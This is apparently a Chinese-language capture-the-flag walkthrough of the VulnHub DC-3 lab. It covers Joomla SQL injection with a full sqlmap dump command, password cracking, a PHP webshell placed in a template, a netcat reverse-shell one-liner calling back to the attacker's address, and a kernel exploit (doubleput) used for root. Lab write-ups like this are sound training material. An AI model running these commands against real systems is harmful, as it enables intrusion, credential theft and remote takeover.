vulnhub DC-3

扫描获取靶机ip

nmap扫描开放端口

只开放了80端口，访问一下，是一个joomla的cms

vulhub有关于这个的漏洞，rce的那个没找到exp，试试失去了注入的poc

说明存在注入，放sqlmap里跑一下

sqlmap -u 'http://192.168.101.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=' -D joomladb -T '#__users' -C name,password,username --dump

john破解密码

把mysql密码的hash保存到一个文件中

得到密码，登录一下试试

没有什么发现，上网找一下joomla的后台页面

访问试试，成功进入后台

输入账号密码登录，成功登录

搜搜joomla后台怎么拿shell

这里用第二种方法

后面改了mime类型和扩展名都不行，图片马也不行，尝试用其他方法

选择第一个

点击new file

文件名为1后缀为php

写入一句话木马

访问一下试试 路径：template/beez3/html/1.php

蚁剑连接

反弹一个shell

尝试了各种反弹命令都失败了，是一下访问反弹，蚁剑创建一个文件，写入如下语句

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.101.76 4444 >/tmp/f');?>

浏览器访问成功反弹

获取一个交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

查看内核版本，搜索exp

wget下载

这里没有下载成功

直接把那两个c文件复制过来

本地开启一个web服务

在/var/www/html目录下创建那两个c文件把代码复制过来

反弹shell终端wget下载

根据exp的教程编译执行

经过一番尝试失败

换另一个exp

使用msf

这个也不行。不会用，菜鸡的无奈。。。。。。

上网搜wp

cat /etc/issue #查看linux版本

搜索kali内的exp

使用39772.txt

进入到39772的路径下

查看txt

下载这个zip

unzip解压这个文件

tar -xvf解压exploit.tar

执行compile.sh这个文件

再执行doubleput这个文件，成功获取root权限（刚开始再本地解压执行compile.sh这个文件不行，必须在靶机上执行）

切换到root目录，成功获取flag